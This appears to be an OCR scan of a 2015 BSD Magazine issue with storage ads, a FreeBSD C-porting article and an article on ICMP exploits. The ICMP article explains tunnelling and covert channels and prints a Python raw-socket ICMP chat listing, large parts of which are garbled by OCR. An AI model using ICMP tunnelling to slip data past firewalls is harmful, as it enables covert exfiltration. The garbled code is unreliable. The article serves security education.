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HOW IMPORTANT IS YOUR DATA? 


Years of family photos. Your entire music 
and movie collection. Office documents 
you've put hours of work into. Backups for 
every computer you own. We ask again, how 
important is your data? 


NOW IMAGINE LOSING IT ALL 


Losing one bit - that’s all it takes. One single bit, and 
your file is gone. 


The worst part? You won't know until you
absolutely need that file again.

[Figure: Example of one-bit corruption]


THE SOLUTION 


The FreeNAS Mini has emerged as the clear choice to
save your digital life. No other NAS in its class offers
ECC (error correcting code) memory and ZFS bitrot
protection to ensure data always reaches disk
without corruption and never degrades over time.

No other NAS combines the inherent data integrity
and security of the ZFS filesystem with fast on-disk
encryption. No other NAS provides comparable power
and flexibility. The FreeNAS Mini is, hands-down, the
best home and small office storage appliance you can
buy on the market. When it comes to saving your
important data, there simply is no other solution.

The Mini boasts these state-of-the-art features:

- Up to 16TB of storage capacity
- 16GB of ECC memory (with the option to upgrade to 32GB)
- 2x 1 Gigabit network controllers
- Remote management port (IPMI)
- Tool-less design; hot swappable drive trays
- FreeNAS installed and configured
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FREENAS 


CERTIFIED 
STORAGE 


With over six million downloads, 
FreeNAS is undisputedly the most 
popular storage operating system 
in the world. 


Sure, you could build your own FreeNAS system: 
research every hardware option, order all the 

parts, wait for everything to ship and arrive, vent at 
customer service because it hasn't, and finally build it 
yourself while hoping everything fits - only to install 
the software and discover that the system you spent 
days agonizing over isn’t even compatible. Or... 


MAKE IT EASY ON YOURSELF 


As the sponsors and lead developers of the FreeNAS 
project, iXsystems has combined over 20 years of
hardware experience with our FreeNAS expertise to 
bring you FreeNAS Certified Storage. We make it 
easy to enjoy all the benefits of FreeNAS without 
the headache of building, setting up, configuring, 
and supporting it yourself. As one of the leaders in 
the storage industry, you know that you're getting the 
best combination of hardware designed for optimal 
performance with FreeNAS. 


Every FreeNAS server we ship is... 


» Custom built and optimized for your use case 

» Installed, configured, tested, and guaranteed to work out 
of the box 

» Supported by the Silicon Valley team that designed and 
built it 

» Backed by a 3-year parts and labor limited warranty
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As one of the leaders in the storage industry, you 
know that you're getting the best combination 

of hardware designed for optimal performance 

with FreeNAS. Contact us today for a FREE Risk 
Elimination Consultation with one of our FreeNAS 
experts. Remember, every purchase directly supports 
the FreeNAS project so we can continue adding 
features and improvements to the software for years 
to come. And really - why would you buy a FreeNAS 
server from anyone else? 


FreeNAS 1U

- Intel® Xeon® Processor E3-1200v2 Family
- Up to 16TB of storage capacity
- 16GB ECC memory (upgradable to 32GB)
- 2x 10/100/1000 Gigabit Ethernet controllers
- Redundant power supply


FreeNAS 2U

- 2x Intel® Xeon® Processors E5-2600v2 Family
- Up to 48TB of storage capacity
- 32GB ECC memory (upgradable to 128GB)
- 4x 1GbE network interfaces (onboard), upgradable to 2x 10 Gigabit interfaces
- Redundant power supply

http://www.iXsystems.com/storage/freenas-certified-storage/ 
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EDITOR’S WORD 


Dear Readers, 


I hope you had a great New Year’s and that you have a lot
of new energy to start this year and fulfill your plans and
resolutions. I do not want to bore you with details as you can
find them in the following pages of this issue. I will briefly tell
you what is inside our BSD publication this time.


I collected the articles written by experts in the field to provide
you with the highest-quality knowledge. In this issue, you will
find articles written by David Carlier, Saumya Dwivedi and Parag
Gupta, Mark Sitkowski, Mark Ryan M. Talabis, Robert McPherson,
I. Miyamoto, Jason L. Martin, and Annie A. Zhang.


You will also find the monthly column by Rob Somerville.
At the end, I decided to add the Presentations section that was
designed for companies that want to present their profile, goals,
ideas, and products. It can be interesting for you to read.


To end, I would like to thank you for reading our magazine
and for being with us. We only need 3 more years to celebrate
the 10th anniversary of the magazine. Everything we do, we do
with you in mind. We are grateful for every comment and opinion,
positive and negative. Every word from you lets us improve BSD
Magazine and brings us closer to the ideal form of our publication.


Enjoy reading, 
Ewa & the BSD team 
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IN BUSINESS 


FreeNAS 
in an Enterprise Environment 


By the time you're reading this, FreeNAS has been downloaded
more than 5.5 million times. For home users, it’s become an
indispensable part of their daily lives, akin to the DVR.
Meanwhile, all over the world, thousands of businesses,
universities, and government departments use FreeNAS to
build effective storage solutions in myriad applications.


WE INTERRUPT THIS MAGAZINE TO BRING YOU THIS IMPORTANT ANNOUNCEMENT:
THE PEOPLE WHO DEVELOP FREENAS, THE WORLD’S MOST
POPULAR STORAGE OS, HAVE JUST REVAMPED TRUENAS.


What you will learn...


• How TrueNAS builds off the strong points of the FreeBSD and [...]
• How TrueNAS meets modern storage challenges for enterprise [...]


The FreeNAS operating system is [...]
the public and offers thorough documentation, [...]
active community, and a feature-rich [...]
the storage environment. Based on FreeBSD, [...]
can share over a host of protocols (SMB, [...]
FTP, iSCSI, etc) and features an intuitive [...]
the ZFS file system, a plug-in system, [...]
much more.
Despite the massive popularity [...]
aren't aware of its big brother [...]
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professionally-supported line of, 
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FreeBSD Corner 


The Journey of a C Developer 
in the FreeBSD World 

David Carlier 

Moving from Linux to FreeBSD involves quite a number of
changes; some gains and some losses. For developers working in
most programming languages, especially the high-level ones,
there are no meaningful disruptive changes. But for languages
like C (and its sibling C++), if you want to port your software,
libraries, etc., some points need to be considered.
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Exploits Using ICMP Protocol 

Saumya Dwivedi and Parag Gupta 
Internet Control Message Protocol (shorthand, ICMP) is a part 
of the Internet Protocol used by network devices to send error 
messages to other connected hosts; for example, to indicate 
that a requested service is not available or a router could not 
be reached. But many times, this protocol is abused to transfer 
malicious data packets. This article will discuss the vulnerabilities 
and security loopholes associated with these types of data 
transfers and potential options to prevent these security attacks. 
You will learn how to understand ICMP and its role in networking. 


Dear JP Morgan, Target, Neiman 
Marcus, Michael’s, Home Depot... 
Mark Sitkowski 

Consider the design of a hypothetical IT installation, which can be
either a retail operation or a financial institution, equipped with
either POS or ATM terminals and operated by bank cards or store
cards. The system will possibly consist of a web server, with your
landing page and login page, a database server, a business server,
which contains transaction records and account details, and an
authentication server, which confirms the identity of each system
user. You will learn the full list of components of a bulletproof IT
system, and which parts you may choose to omit if the extra risk is
justifiable.
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Information Security Analytics 
Finding Security Insights, Patterns, 
and Anomalies in Big Data. 

Access Analytics 

Mark Ryan M. Talabis, Robert McPherson,
I. Miyamoto, Jason L. Martin, D. Kaye

There are so many ways that malicious users can access IT 
systems right now. In fact, the very technologies affording us the 
convenience to remotely access our IT systems are the ones 
that are being manipulated by malicious users. In today’s IT 
environment, physical access is no longer a hindrance to gaining 
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access to internal resources and data. The authors would like to 
provide some techniques and tools that could help you in these 
types of scenarios. Some of the things the authors will explore 
include knowledge engineering, by means of programming 
detection strategies. If you do not know how to program, do not 
worry. The authors will provide simple techniques and step-by- 
step, walkthrough instruction to get you going. 


Expert Says...


FreeNAS 9.3 Features — Support for
VMware VAAI
Annie A. Zhang


Column


With the recent deaths from the Charlie
Hebdo terrorist attack in Paris, what
implications does this tragic event have
for freedom of speech not only for print
journalists but the Internet community
at large?
Rob Somerville


Presentations

Stratoscale
BSD Team


At Stratoscale, the team is focused on how technology can be
leveraged to help IT teams make better and more profitable
use of existing infrastructure. They know that data needs are
growing at an ever-increasing pace, so they've built a
hardware-agnostic and hyper-converged software solution that
lowers the cost of scale-out and allows your IT infrastructure
to keep up with business growth.

AexolGL — New 3D Graphics Engine
AexolGL Team 

Aexol specialises in creating mobile applications. It was created 
by Artur Czemiel, a graduate of the DRIMAGINE 3D Animation 
& VFX Academy, who has a lifelong interest in 3D technology. 
He first started to realise his passion by working in the film 
industry. Artur is the co-creator of the special effects in the 
Polish production “Weekend” and the short film “Hexaemeron”,
which was awarded the Finest Art award at the Fokus Festival 
and nominated as the best short animated film at fLEXiff 2010 
Australia. The experience gained by working in the movie 
industry and in the mobile applications market was the basis 
for creating AexolGL — a tool designed to make work easier for 
Aexol and other programmers around the world. 
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The BIGGEST, the BEST, the TEXAS AIST 
SharePoint Conference ever!


SharePoint is at the Crossroads —
Which Way Will You Go?


SharePoint in the cloud or on premises? Or both? Come to SPTechCon Austin
2015 and learn about the differences between Office 365, cloud-hosted
SharePoint, on-premises SharePoint, and hybrid solutions and build your
company’s SharePoint Roadmap!

For developers, the future means a new app model and new app paradigms.
For IT pros and SharePoint admins, it’s trying to retain control over an
installation that’s now in the cloud. For information workers and their
managers, it’s about learning how to work ‘social.’ But it’s not for everyone.
Where do you need to be?

The answer is simple: SPTechCon Austin. With a collection of the top
SharePoint MVPs and expert speakers, more than 80 classes and tutorials
to choose from and panels focused on the changes in SharePoint,
SPTechCon will teach you how to master the present and plan for the future.


SPTechCon Austin
February 2015
Renaissance Austin Hotel

80+ Classes
40+ Microsoft Expert Speakers

Get Your Texas-Sized Registration Discount:
Register NOW!



FREEBSD CORNER 


The Journey of a C Developer
in FreeBSD’s World


Moving from Linux to FreeBSD involves quite a number
of changes; some gains and some losses. For developers
working in most programming languages, especially the
high-level ones, there are no meaningful disruptive changes.
But for languages like C (and its sibling C++), if you want to
port your software, libraries, etc., some points might need
to be considered.


What you will learn...


• How to move from Linux to FreeBSD
• How to develop under FreeBSD


What you should know...


• Basic knowledge of C programming


As is often the case with C, it is not especially straightforward:
the code itself might need some changes, minus the pure POSIX part.
Let’s say your program needs to use some known network functions.


#include <sys/param.h>  /* defines BSD, the current FreeBSD version, etc. */

#if defined(BSD)
#include <netinet/in.h>
#endif

#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int
main(int argc, char *argv[])
{
        struct in_addr in;
        const char *ip = argv[1];

        /* inet_pton() returns 1 on success, 0 for an invalid address, -1 on error */
        if (argc < 2 || inet_pton(AF_INET, ip, &in) != 1)
                return (1);

        return (0);
}

Here we have a more complex case; for example, how
do we get the MAC address of an interface?

int
main(int argc, char *argv[])
{
        struct ifreq ifr;
        char hwaddr[6] = { 0 };

        /* ... open the socket clsock and select the interface ... */
#if defined(__linux__)
        /* clsock: an open socket; ifr.ifr_name holds the interface name */
        if (ioctl(clsock, SIOCGIFHWADDR, &ifr) == 0)
                memcpy(hwaddr, ifr.ifr_hwaddr.sa_data, sizeof(hwaddr));
#elif defined(BSD)
        /* ifa: the AF_LINK entry of the interface, e.g. from getifaddrs(3) */
        struct sockaddr_dl *cl = (struct sockaddr_dl *)(ifa->ifa_addr);
        unsigned char *p = (unsigned char *)LLADDR(cl);

        memcpy(hwaddr, p, sizeof(hwaddr));
#endif
        /* ... use hwaddr ... */
}


In addition, FreeBSD provides a bunch of specific functions
like strlcpy/strlcat (safer versions of strcpy/strcat) and the
strtonum family of functions, all of which are available in the
base system, whereas on Linux you must install a separate BSD
compatibility library to have them. If you have any doubts about
any function, all the manpages are available and very well written.


The environment 

FreeBSD ships with clang by default, whereas Linux relies on the
GCC suite. If you heavily use OpenMP, clang does not provide it
yet, so you might need to install GCC from ports. On the other
hand, clang mostly compiles faster and provides more informative
warning and error messages. Fortunately, the two compilers share
a significant number of common flags.

On Linux, you may use a custom memory allocator like jemalloc
during your development. It's a very handy and useful library
which allows you to generate statistics, fill freed memory with
specific values, and spot corrupted memory usage.

Good news! You do not need to install it: FreeBSD libc’s malloc
is jemalloc (it replaced the older phkmalloc). To print
statistics from your application, for example, you need to
include malloc_np.h instead of jemalloc/jemalloc.h.

As for the makefiles, FreeBSD uses the BSD format, which differs
from the GNU style.

A basic makefile for a library:


LIB=            mylib
SHLIB_MAJOR=    1
SHLIB_MINOR=    0
# => in addition to the static versions (profiled and non-profiled),
#    the shared version will be compiled
SRCS=           mylib.c

.include <bsd.lib.mk>




A basic makefile for an application: 


# => will compile an app called myprog
PROG=           myprog
SRCS=           main_prog.c
# => always append to CFLAGS; some flags, like -fstack-protector and
#    -Qunused-arguments, are added automatically
CFLAGS+=        -I${.CURDIR}/../mylib
# => linked to libutil.a and ${.CURDIR}/../mylib/libmylib.a
LDADD=          -lutil -lmylib
DPADD=          ${LIBUTIL} ${.CURDIR}/../mylib/libmylib.a

.include <bsd.prog.mk>


FreeBSD can also handle GNU-style builds: (gnu)make, libtool, etc.
are available via the ports.

Or, to save the effort of porting this part, it might be handier
to use cmake or scons.


The publication 

You might want to publish your library or application the pure
FreeBSD way. You can make a port, which can offer some options
to the user. It can download the source and compile it with its
dependencies in a natural manner. In addition, you can build a
binary package to facilitate distribution. Example of a port
Makefile:


PORTNAME=       mylib
PORTVERSION=    1
PORTREVISION=   0

MAINTAINER=     john.doe@email.com

LICENSE=        BSD

# => shows the curl option to the user, then adds a flag during
#    compilation when the option is selected
OPTIONS_DEFINE=         CURL_SUPPORT
CURL_SUPPORT_DESC=      Enable Curl support

.include <bsd.port.options.mk>

.if ${PORT_OPTIONS:MCURL_SUPPORT}
CFLAGS+=        -DCURL
.endif

.include <bsd.port.mk>


For instance, you can put the .tar.gz archive of the library in
/usr/ports/distfiles, then type make checksum. Then, make install
will compile and install it in /usr/local. The FreeBSD Porter's
Handbook is very useful to read.

Furthermore, you can build a binary version of this port to
facilitate its distribution. It is as simple as pkg create mylib,
which will create a txz archive in the current folder. In the end,
pkg install mylib will install it.


The conclusion 

Developing under FreeBSD is not the extreme challenge
you might think it is. Even better, from coding to publishing,
everything is thought out and made in a consistent way
without any external dependencies. If you want to go even
further, into kernel development for example, again it is easy
and in base. So there is no real reason to stay away from
FreeBSD anymore: you are more than welcome.


DAVID CARLIER 


David Carlier has been working as a software developer since 2001.
He has used FreeBSD for more than 10 years and, starting this year,
became involved with the HardenedBSD project and has done serious
development on FreeBSD. He worked for two years in Ireland for a
mobile product company that provides C++ APIs. From this, he became
completely inspired to develop on FreeBSD.


About HardenedBSD


The HardenedBSD project was created in 2014 by Oliver Pinter 
and Shawn Webb. The project aims to provide security enhance- 
ments to the FreeBSD project. We plan to upstream most, if not 
all, of our projects. 

The core HardenedBSD team consists of: 


• Oliver Pinter
• Shawn Webb


The developer team consists of:


• David Carlier
• Nathan Dautenhahn
• Danilo Egea Gondolfo
• Oliver Pinter
• Shawn Webb


The following people and organizations have contributed to the
HardenedBSD project:


• Ilya Bakulin
• Bryan Drewery
• Danilo Egea Gondolfo
• Dag-Erling Smørgrav
• Robert Watson
• Hunger
• SoldierX: donated a sparc64 and a BeagleBone Black
• Hyper6: designed logo
• Automated Tendencies: substantial monetary donation
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Exploits Using ICMP 


Protocol 


Internet Control Message Protocol (shorthand, ICMP) is a part 
of the Internet Protocol used by network devices to send 
error messages to other connected hosts; for example, to 
indicate that a requested service is not available or a router 
could not be reached. But many times, this protocol is abused 
in transferring malicious data packets. This article discusses 
the vulnerabilities and security loopholes associated with 
such types of data transfers and potential options to prevent 


these security attacks. 


What you will learn... 


• Understanding ICMP and its role in networking
• ICMP as a potential host for malicious activities
• Potential attacks with ICMP
• Security measures


[...] across network boundaries (source: Wikipedia). The Internet
Protocol (IP) is based on a connectionless mode of transmission
and hence is not designed to be absolutely reliable. Since the
network infrastructure is unreliable, it is important to notify
the sender with appropriate messages in case something goes wrong,
such as packet loss, data corruption, or out-of-order delivery.
This is where the Internet Control Message Protocol steps in. It
is the mechanism used to give feedback on network problems that
have blocked or intercepted packet delivery. Higher-level
protocols, like TCP, are able to realize that packets aren't
getting through, but ICMP provides a method for discovering more
specific problems, such as “TTL exceeded” or “need more fragments.”
ICMP differs from transport protocols such as TCP and UDP in that
it is not typically used to exchange data between systems (although
ICMP has been used for data transfer for quite some time now via
ICMP tunnelling).
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What you should know... 


• Basic knowledge of computer networks and protocols like IP and ICMP
• Basic knowledge of network infrastructure
• Basic knowledge of packet programming


The point to note is that the purpose of these control
messages is to provide feedback about problems in the
communication environment, not to make IP reliable.
There is still no guarantee that a packet will be delivered
or that a control message will be returned. Nevertheless, the
majority of ICMP message types are required for the proper
operation of IP, TCP and other protocols; ping and traceroute
are two of the most prominent utilities that use ICMP.


ICMP Packet Structure and Details 

ICMP uses the basic support of IP as if it were a higher-level
protocol; however, ICMP is actually an integral part of IP
and must be implemented by every IP module. An ICMP
packet is therefore an IP packet with ICMP in the IP data
portion. Every ICMP error message also contains the entire IP
header from the original message, so the end system will
know which packet actually failed. The first eight bytes
of the original IP data are included as well; this is normally
the start of the TCP header or the whole UDP header. Below is a
figure of the IP packet format. The ICMP portion can be seen in
the shaded area. Some of the important fields are described below.


Version | IHL | TOS | Total Length
Identification | Fragment Offset
TTL | Protocol = 0x01 | Header Checksum
Source Address
Destination Address
Options (optional) | Padding
Type | Code | Checksum
ICMP data (variable)

Figure 1. IP packet format (the Type, Code, Checksum, and ICMP data
rows form the ICMP message)

• IP Header: Protocol set to 1 (for ICMP)
• Type (8 bits): For example, 0 - echo (ping) reply, 3 - Destination
  Unreachable, 8 - echo (ping) request, 11 - Time Exceeded
• Code (8 bits): Subtype of the message
• Checksum (16 bits): The 16-bit one’s complement of the one’s
  complement sum of the ICMP message, starting with the Type field
• Data load: Can be of arbitrary length, left to the implementation.
  However, the packet must fit within the Maximum Transmission Unit
  of the network or risk being fragmented.
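
The field layout above can be made concrete with a short Python sketch. It is only an illustration, assuming the echo message layout from RFC 792 (type, code, checksum, identifier, sequence number, data); the function names internet_checksum, build_echo_request and parse_icmp are hypothetical and do not come from any library.

```python
import struct


def internet_checksum(data: bytes) -> int:
    """16-bit one's complement of the one's complement sum of the data."""
    if len(data) % 2:
        data += b"\x00"              # pad odd-length input with a zero byte
    total = 0
    for (word,) in struct.iter_unpack("!H", data):
        total += word
    while total >> 16:               # fold the carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(identifier: int, sequence: int, payload: bytes) -> bytes:
    """Type 8, code 0, checksum, identifier, sequence number, then the data."""
    header = struct.pack("!BBHHH", 8, 0, 0, identifier, sequence)
    checksum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, checksum, identifier, sequence) + payload


def parse_icmp(message: bytes) -> dict:
    """Split an ICMP echo message into its fields and verify the checksum."""
    icmp_type, code, checksum, identifier, sequence = struct.unpack(
        "!BBHHH", message[:8])
    return {
        "type": icmp_type,
        "code": code,
        "checksum": checksum,
        "identifier": identifier,
        "sequence": sequence,
        "data": message[8:],
        # Summing a message that carries a correct checksum yields zero.
        "valid": internet_checksum(message) == 0,
    }
```

Calling parse_icmp(build_echo_request(1, 1, b"hello")) returns the fields again with "valid" set to True; changing any payload byte afterwards makes the check fail.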


The address of the source in an echo message will be
the destination of the echo reply message. To form an
echo reply message, the source and destination addresses
are simply reversed, the type changed to 0, and
the checksum recomputed. The data received in the echo
message must be returned in the echo reply message.
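
As a rough illustration of these three steps, the following Python sketch turns an echo request into the matching reply. The helper names checksum and make_echo_reply are hypothetical, and the addresses are passed as plain strings because the IP header itself is outside the scope of the sketch.

```python
import struct


def checksum(data: bytes) -> int:
    """One's complement of the one's complement sum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(word for (word,) in struct.iter_unpack("!H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def make_echo_reply(src: str, dst: str, request: bytes):
    """Return (reply_src, reply_dst, reply_message) for an echo request."""
    if request[0] != 8:
        raise ValueError("not an ICMP echo request")
    # Identifier, sequence number and data are returned unchanged.
    body = request[4:]
    header = struct.pack("!BBH", 0, 0, 0)      # type 0, code 0, checksum 0
    reply = struct.pack("!BBH", 0, 0, checksum(header + body)) + body
    # The addresses are simply reversed.
    return dst, src, reply
```

Because the reply carries the request data back verbatim, anything placed in the request payload makes the full round trip, which is what the tunnelling techniques described later rely on.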

The identifier and sequence number may be used by 
the echo sender to aid in matching the replies with the 
echo requests. For example, the identifier can be used 
to identify a session (similar to ports in TCP and UDP), 
and the sequence number might be incremented on each 
echo request sent. Code 0 may be received from a gate- 
way or a host. 
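
One possible way for an echo sender to use the two fields is sketched below in Python. The EchoTracker class is hypothetical; it assumes one identifier per session and a 16-bit sequence number that is incremented for every request.

```python
import time


class EchoTracker:
    """Match echo replies to outstanding echo requests (illustrative only)."""

    def __init__(self, identifier: int):
        self.identifier = identifier     # identifies this ping session
        self.next_sequence = 0
        self.pending = {}                # sequence number -> send time

    def next_request(self, now=None):
        """Reserve the next sequence number and remember when it was sent."""
        sequence = self.next_sequence
        self.next_sequence = (sequence + 1) & 0xFFFF   # the field is 16 bits
        self.pending[sequence] = time.monotonic() if now is None else now
        return self.identifier, sequence

    def match_reply(self, identifier: int, sequence: int, now=None):
        """Return the round-trip time, or None for an unexpected reply."""
        if identifier != self.identifier:
            return None                  # belongs to another session
        sent = self.pending.pop(sequence, None)
        if sent is None:
            return None                  # duplicate or unsolicited reply
        return (time.monotonic() if now is None else now) - sent
```

The optional now argument exists only to make the sketch easy to exercise with fixed timestamps.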

Infrequent problems, such as the IP checksum being
wrong, will not be reported by ICMP. The premise is that
TCP or other reliable protocols can deal with this type of
packet corruption, while unreliable protocols do not care
about such small packet losses.

ICMP messages typically report errors encountered in the
processing of packets. To avoid the infinite regress of
messages about messages, no ICMP messages are sent about
ICMP messages; if they were, they would quickly multiply
and create a storm of ICMP packets. ICMP messages are not
sent in response to packets addressed to broadcast or
multicast addresses either, to prevent broadcast storms.
Similarly, ICMP messages are only sent about errors in
handling fragment zero of fragmented packets (fragment zero
has a fragment offset equal to zero). [Source: RFC 792]
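
These three rules can be summarised as a small predicate. The Python sketch below is a simplification under stated assumptions: the function name may_send_icmp_error and its parameters are hypothetical, and the directed broadcast check only works when the caller supplies the local network.

```python
import ipaddress
from typing import Optional

IPPROTO_ICMP = 1   # value of the Protocol field for ICMP


def may_send_icmp_error(protocol: int, destination: str, fragment_offset: int,
                        local_network: Optional[str] = None) -> bool:
    """Decide whether an ICMP message may be generated about a packet."""
    dst = ipaddress.ip_address(destination)
    if protocol == IPPROTO_ICMP:
        return False                     # never report on ICMP messages
    if dst.is_multicast or dst == ipaddress.ip_address("255.255.255.255"):
        return False                     # multicast or limited broadcast
    if local_network is not None:
        if dst == ipaddress.ip_network(local_network).broadcast_address:
            return False                 # directed broadcast of the local net
    if fragment_offset != 0:
        return False                     # only fragment zero is reported
    return True
```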


ICMP as a potential host for malicious activities 
ICMP Vulnerability 

ICMP is generally not considered a threat, at least not by
the majority of network administrators. It is very common
to add security mechanisms (intrusion detection and
prevention systems, etc.) to a corporate network, but in the
end all types of ICMP packets, with all payload sizes, pass
freely, at least from within the private network to the
outside world. This leniency can be used to send sensitive
data outside a private network without relying on SMTP,
HTTP or other upper layer protocols that are commonly
monitored and logged.

The vulnerability in ICMP exists because RFC 792,
the IETF specification governing ICMP packets, allows
an arbitrary data length for any type 0 (echo reply) or
type 8 (echo request) ICMP packet.

Firewalls, depending on the services required by their
internal networks, totally block or partially filter Internet
packets. IP Filter, for example, uses stateful packet
filtering. The state engine not only inspects the presence of
ACK flags in TCP packets but also includes sequence
numbers and window sizes in its decision to block or to
allow packets. However, IP Filter does not check the
content of ICMP packets and hence fails to prevent covert
channels that can arise from misuse of the payload of
ICMP packets. Therefore, although TCP and UDP continue
to be the main subject of vulnerability studies, ICMP also
provides several means for stealth traffic.


Past Security Threats and Attacks 

In early February 2000, a distributed denial of service
attack was launched against many popular Internet sites.
It is reported that almost all of the tools used in the
distributed denial of service (DDoS) attacks on these sites
used ICMP for covert communications between the
DDoS clients and the attacker's handler program. Since
ICMP tunneling is very simple to deploy and can cause
a significant amount of damage, it has been classified as
a high-risk security threat by Internet Security Services.
Some of the most widely known distributed denial of
service attack tools, like Tribe Flood Network 2000 (TFN2K)
and Stacheldraht, rely on ICMP tunneling to establish
communication channels between the compromised machines
and the attacker's machine.
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Potential Attacks through ICMP 

ICMP is supposed to be a relatively simple protocol, but it 
can be altered to act as a medium for evil purposes. It is 
therefore important to understand how this protocol can 
be used for malicious purposes. This understanding fur- 
ther enables us to counter such attacks and be prepared 
for them. 


ICMP Tunneling 

An ICMP tunnel (also known as ICMPTX) establishes
a covert connection between two remote computers (a
client and a proxy), using ICMP echo request and reply
packets. An example of this technique is tunneling complete
TCP traffic over ping requests and replies. ICMP tunneling
works by injecting arbitrary data into an echo packet
sent to a remote computer. The remote computer replies
in the same manner, injecting an answer into another
ICMP packet and sending it back. The client performs all
communication using ICMP echo request packets, while
the proxy uses echo reply packets.

ICMP tunneling can be used to bypass firewall rules 
through obfuscation of the actual traffic. Depending on the 
implementation of the ICMP tunneling software, this type 
of connection can also be categorized as an encrypted 
communication channel between two computers. With- 
out proper deep packet inspection or log review, network 
administrators will not be able to detect this type of traffic 
through their network. 
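
To give an idea of what such an inspection could look like, here is a minimal Python sketch. It rests on two assumptions that are not part of the original text: ordinary ping payloads are small (the 64-byte limit is an arbitrary threshold), and a legitimate echo reply returns exactly the data of the request, whereas a tunnel proxy injects its own answer. The names echo_message and EchoInspector are hypothetical.

```python
import struct


def echo_message(icmp_type, identifier, sequence, payload):
    """Build an echo message for experiments (checksum left at zero)."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, identifier, sequence) + payload


class EchoInspector:
    """Flag echo traffic that does not look like an ordinary ping."""

    def __init__(self, max_payload=64):
        self.max_payload = max_payload   # assumed limit, tune per network
        self.requests = {}               # (src, dst, id, seq) -> payload

    def inspect(self, src, dst, message):
        findings = []
        icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", message[:8])
        payload = message[8:]
        if icmp_type not in (0, 8):
            return findings              # only echo traffic is inspected
        if len(payload) > self.max_payload:
            findings.append("oversized payload")
        if icmp_type == 8:
            self.requests[(src, dst, ident, seq)] = payload
        else:
            expected = self.requests.pop((dst, src, ident, seq), None)
            if expected is None:
                findings.append("unsolicited reply")
            elif expected != payload:
                findings.append("reply payload differs from request")
        return findings
```

A real deployment would also have to expire old entries in the request table and handle truncated packets; both are left out to keep the sketch short.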

The following code snippet gives an example of a chat 
application developed using ICMP tunnelling: 


¢ Impacket: Install the latest stable release from here: 
https://pyp!i.python.org/pypi/impacket 

¢ Socket: This python library is used to make a SOCK _ 
RAW for receiving and sending data packets. Us- 
ing SOCK_RAW, the application connects directly to 


Listing 1. An example of a chat application developed using ICMP 
tunnelling 


5 sulci joyce clasic eisjolli@eeie joy (eiicsie syewhe 12 eielclicsisis 


and destination IP address and start chatting) 


#!/usr/bin/python 
import socket 

Lrom Ssocker Ampork * 
import threading 
import time 


iene Ss aseparell 


MOO ees) .c 


from impacket import ImpactPacket as imp 


source = dest = sock = 


Get so teialy nave lens rane =r aame)e: 
joeiae  evssall cs) mere Telaveicre ioral! 
Sys.ex7b (0) 


def getSocket (sock): 
# Open a raw socket listening on all ip addresses 
Sock — socker(At INET, SOCK RAW, EPPROTO ICMP) 
SOc sSersoOckopE ( IPPROTO Ir 7 iP BPRINCL |) 
SOc barnes aa) ) 


return sock 


OGE COlesuUruceracker( segues tyee, Message, ssOUree, 
dest): 


icmp = imp.ICMP() # Making ICMP packet 


CUS SSE WSS eyes (icSclesic InyisS) 7; INecuIes: joe 

icmp.contains (imp.Data (message) ) 

ip = imp.IP() # IP packet to wrap the icmp 
packet 

1s SSE to) Sige: (SOUS) 

Donoso. Upecs Rides tr) 

1 JO) (ele deel aLions) (| Liemyo) 


PS EUIGM TOS jSeeke |) 


clei Ce jel selliecs eolele loseclsic) 2 
SOUnCC Oy — sl eeNeader (S.-i source] dedrecs als 
second last 4 bytes 
# converting to dotted decimal format 


Pac Kegs Ounce yadie roo Wot ol ol On (Soumee ie | O1)y, 
Geol (SOULS 176 | Il]|)) - eieel(soulecS 149)\2 ||) 5 ech Soules 
ate, Sp) 


Ceturn Pack: ysource adic 


def processMessage (message) : 


print ‘Msg:%s’ % (message) # CHANGE 
def receive(): 
global sock, source 
while True: 
data = sock.recv(1024) # received data 


ip vteader ~~ — data: 20] # IP header is first 20 
bytes 

iemp header = data[20:28] # ICMP header is next 8 
bytes 


Lenpeeype = Ord (data) 2) |) 
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No. Time SOUrce Destination Protocol Length Info 
-_ ~10.000000—s«10.0.0.1 -10.0.0.2 ‘ICMP 87 Echo (ping) request id=0x0000, seq=0/0, ttl=255 
J00# 16.6.6.2 10.0.0.1 ICMP 67 Echo (ping) reply id-0x0000, seq-0/0, ttl-6G4 


ap 


b Internet Protocol version 4, Src: 10.0.0.1 (10.0.0.1), Dst: 10.0.0.27 (10.0.0.7) 


~ 


¥ Internet Control Message Protocol | 


Type: 8 (Echo (ping) request) 
Code: 0 
Checksum: OxaeSa [correct] 
Identifier (BE): @ (Ox0000) 
Identifier (LE): 0 (OxGGg00) 
Sequence number (BE): © (OxG000) 
Sequence number (LE): & (Ox0000) 
[Response In: 2] 
~ Data (45 bytes) 
Data: 48696: 6c6! 20426/ 6227120486[ TOSS 207961 752061726520... 
[Length: 45] 


oO OO DE OO BU OO OO UO 
d4 oo ff o1 


(| Data (data), 45 bytes Packets: 2 Displayed: 2 Marked: 0 Profile: Default 


Figure 2. The CMP packet as captured by wireshark 


        message = data[28:]           # Rest is our Payload/Msg
        # The next two statements are only partly legible in the printed
        # listing. Assumed reading: skip our own packets and echo replies.
        packet_source = socket.inet_ntoa(ip_header[12:16])
        if packet_source != source and icmp_type != 0:    # CHANGE
            processMessage(message)


def write():
    global sock, source, dest
    while True:
        message = raw_input()         # prompt string illegible in the listing
        packet = constructPacket(8, message, source, dest)
        sock.sendto(packet, (dest, 0))    # Sending the packet


class Reader(threading.Thread):
    def __init__(self, threadID, name):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name

    def run(self):
        receive()


class Writer(threading.Thread):
    def __init__(self, threadID, name):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.name = name

    def run(self):
        write()


def main():
    signal.signal(signal.SIGINT, signal_handler)
    global sock, dest, source
    sock = getSocket(sock)
    source = raw_input()              # prompt strings illegible in the listing
    dest = raw_input()
    # Create new threads
    thread1 = Reader(1, "Reader-1")
    thread1.daemon = True
    thread2 = Writer(2, "Writer-1")
    thread2.daemon = True
    # Start new Threads
    thread1.start()
    thread2.start()
    while True:
        time.sleep(1)


if __name__ == '__main__':
    main()

the IP layer and does not use either the TCP or UDP
transport.

• Threading: We made two threading classes, Reader
and Writer. One thread is instantiated from each class, so
